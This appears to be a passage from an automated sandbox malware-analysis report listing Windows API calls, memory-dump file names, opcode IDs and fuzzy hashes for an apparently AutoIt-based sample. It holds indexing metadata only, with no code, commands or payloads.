                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                • Opcode ID: e4f9fc0775f6f7b14eb8f1b57dfca7d7471edb91c3fc3c40da03d6da52049bbc
                                                                                                                                                                                                                                                                • Instruction ID: e4349a7a8cc215558269212fbd5e34458d51b06071fbe33078e84f04bfc7b0d1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4f9fc0775f6f7b14eb8f1b57dfca7d7471edb91c3fc3c40da03d6da52049bbc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0318EB0A043119FD761EF24D8847D7BBE9FB49708F00492EF69983340E775AA84DB56
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 0068F661
                                                                                                                                                                                                                                                                  • Part of subcall function 0067D730: GetInputState.USER32 ref: 0067D807
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 006CF2DE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4149333218-0
                                                                                                                                                                                                                                                                • Opcode ID: f51d3710f0228d7e3cd9c595ca8e4135bc2fd4625ed270c0a0df4244c1a2126c
                                                                                                                                                                                                                                                                • Instruction ID: 3fa48b08f024357767692b7162638054f716925011c36fbcad5f9d2502a162ad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f51d3710f0228d7e3cd9c595ca8e4135bc2fd4625ed270c0a0df4244c1a2126c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98F08C312402059FD354EF69D44AB6AB7EAEF45761F00822DE85DC72A0EF70A800CB99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00674E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00674EDD,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674E9C
                                                                                                                                                                                                                                                                  • Part of subcall function 00674E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00674EAE
                                                                                                                                                                                                                                                                  • Part of subcall function 00674E90: FreeLibrary.KERNEL32(00000000,?,?,00674EDD,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674EC0
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674EFD
                                                                                                                                                                                                                                                                  • Part of subcall function 00674E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006B3CDE,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674E62
                                                                                                                                                                                                                                                                  • Part of subcall function 00674E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00674E74
                                                                                                                                                                                                                                                                  • Part of subcall function 00674E59: FreeLibrary.KERNEL32(00000000,?,?,006B3CDE,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674E87
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                • Opcode ID: 066aedc963a80dfb07d249d38190a02c42b8314a0583937d246b5d774ff451c8
                                                                                                                                                                                                                                                                • Instruction ID: bc8e55a20edfd5cc7418905b90edbb39726f0984e7c78f31f30348d6131bf43d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 066aedc963a80dfb07d249d38190a02c42b8314a0583937d246b5d774ff451c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25110132600205AACB10EB70DC0ABAD77A6AF80710F20C42DF04AA62C1EFB59A459B58
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __wsopen_s
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                • Opcode ID: 18c7c5e38070e748bf528c94747af5ed9f7ac61b695de48ffad83a00653557d1
                                                                                                                                                                                                                                                                • Instruction ID: 667f006820152c08445e78741083e292dd8cec298d9859e3f09620ec66ff1222
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18c7c5e38070e748bf528c94747af5ed9f7ac61b695de48ffad83a00653557d1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD11187590420AAFCB05EF58E9459DA7BF9EF49314F104099F808AB312DB31DE11CBA9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                                                                                                                                                • Instruction ID: e576880390945a8185c69933fc946315a5c6ad1811dc10ebe565eac1cba42370
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF0F932510E109ADE717A698C05B96339F9FA3331F10072DF420D7AD2DF75E8028AAD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00741444,?,0068FDF5,?,?,0067A976,00000010,00741440,006713FC,?,006713C6,?,00671129), ref: 006A3852
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: dce766c804e5a610ce89067f6f54c050f57fa4878af91cfa172534c4da84492b
                                                                                                                                                                                                                                                                • Instruction ID: 34cf1e90ee7d562e0188b1f15bf0fb35628ca503a774a351fb680207470bdc78
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dce766c804e5a610ce89067f6f54c050f57fa4878af91cfa172534c4da84492b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAE0E53110123496DA213B669C05FDA375FAF437B0F054125BC0592B80DF18DE028BE4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00741418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00674F6D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                • Opcode ID: 902acb239060c4ff7c26cc52e0eba61e9715dab2d82e0b16f9529d5562951a5d
                                                                                                                                                                                                                                                                • Instruction ID: 018d4f5e04e57ee8bf7f05736d1874f467be10008c7b4c15726ef8930b6ff7e4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 902acb239060c4ff7c26cc52e0eba61e9715dab2d82e0b16f9529d5562951a5d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30F03971105752CFDB349F64D498862FBE6EF55329320CA7EE1EE82621CB3A9884DF10
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00702A66
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2353593579-0
                                                                                                                                                                                                                                                                • Opcode ID: 4291adc1cc213187842ec9dbdda5ff96c3270c2b519398b5e9b3218e6de22739
                                                                                                                                                                                                                                                                • Instruction ID: 95093b0c4e819a62f4d86fb9e0ec0d800c33d9f420e5e6cca553ff5ef9f53c26
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4291adc1cc213187842ec9dbdda5ff96c3270c2b519398b5e9b3218e6de22739
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1E0DF72740216EAC760EB30DC848FA739CEB10390B10823ABC1BC6241EF38898682A4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000002,?), ref: 0067314E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                • Opcode ID: ed0103d5d4a90a59fd182daf1e6de1ad87a8ea9d5f9dfde2cbef7cfbcc123bc0
                                                                                                                                                                                                                                                                • Instruction ID: c3552c840d8b79fe0adec6342fb9a47f29e6b9f4e1989302d58dbb4179f7b276
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed0103d5d4a90a59fd182daf1e6de1ad87a8ea9d5f9dfde2cbef7cfbcc123bc0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CF0A7709003149FEB62AF24DC457D57BFCA701708F0041EAA14897281DB7447C8CF45
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00672DC4
                                                                                                                                                                                                                                                                  • Part of subcall function 00676B57: _wcslen.LIBCMT ref: 00676B6A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 541455249-0
                                                                                                                                                                                                                                                                • Opcode ID: 13ae075d180392f66e479eb7ab4dd4d70e0fbc3501e6ef098c2f01a201e32e7e
                                                                                                                                                                                                                                                                • Instruction ID: fac7d9ea4ca000afba2744d52f99874480a8ab06c08290aec0d66df7c93c68c3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13ae075d180392f66e479eb7ab4dd4d70e0fbc3501e6ef098c2f01a201e32e7e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAE0CD726001245BC7119358DC05FEA77DDDFC9790F044175FD09D7249D964ADC0C654
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00673837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00673908
                                                                                                                                                                                                                                                                  • Part of subcall function 0067D730: GetInputState.USER32 ref: 0067D807
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00672B6B
                                                                                                                                                                                                                                                                  • Part of subcall function 006730F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0067314E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3667716007-0
                                                                                                                                                                                                                                                                • Opcode ID: 02eeceaf74683cad6ff56d21147e90dd8a81d36e737c54be3364c4d33ea4384a
                                                                                                                                                                                                                                                                • Instruction ID: 942da974f0d43b4ce66ac9924867db4052046bd4cbca2f0101a584292e8aea8b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02eeceaf74683cad6ff56d21147e90dd8a81d36e737c54be3364c4d33ea4384a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57E0262130025803CA48BB3498124ADA75B8FD2351F40C93EF04A432A3CF284585421A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 006DDF40
                                                                                                                                                                                                                                                                  • Part of subcall function 00676B57: _wcslen.LIBCMT ref: 00676B6A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FolderPath_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2987691875-0
                                                                                                                                                                                                                                                                • Opcode ID: 0639636ef266e268bf5d8ee1e549456707cad49cd4fc2f9ae78140783142f1d0
                                                                                                                                                                                                                                                                • Instruction ID: 8dd917389e738f1debe76fb47aae447b947ff50422fc81405426a0a1cb92a06e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0639636ef266e268bf5d8ee1e549456707cad49cd4fc2f9ae78140783142f1d0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DD05EA2A002286BDFA0A774DC0DDF73AACD740210F0046A0786DD3152E924DE8486B0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,006B0704,?,?,00000000,?,006B0704,00000000,0000000C), ref: 006B03B7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                • Opcode ID: 4cb400460d2b9a1050a37e9ace85d8646f4242149c013e930964876543c7a25b
                                                                                                                                                                                                                                                                • Instruction ID: 52fddc863a6ef67570f5ece4d21d421bfe67416b24c62a431f372df3433b19ac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cb400460d2b9a1050a37e9ace85d8646f4242149c013e930964876543c7a25b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3D06C3204010DFBDF028F84DD06EDA3BAAFB48714F018100BE1856020C736E821AB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00671CBC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoParametersSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3098949447-0
                                                                                                                                                                                                                                                                • Opcode ID: 2df282f278294eae14db9e2f2a01f1a5a23e7ebe9abbe4da7f7e68e885471b5c
                                                                                                                                                                                                                                                                • Instruction ID: 9bdd244d0dfb8e2508d5d561569e8caf98d718ec7861b09e325e5d9104724437
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2df282f278294eae14db9e2f2a01f1a5a23e7ebe9abbe4da7f7e68e885471b5c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACC09B3D280304DFF2155B80BC5AF107754A349F00F54C102F609555E3C7A51471D658
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006D1114
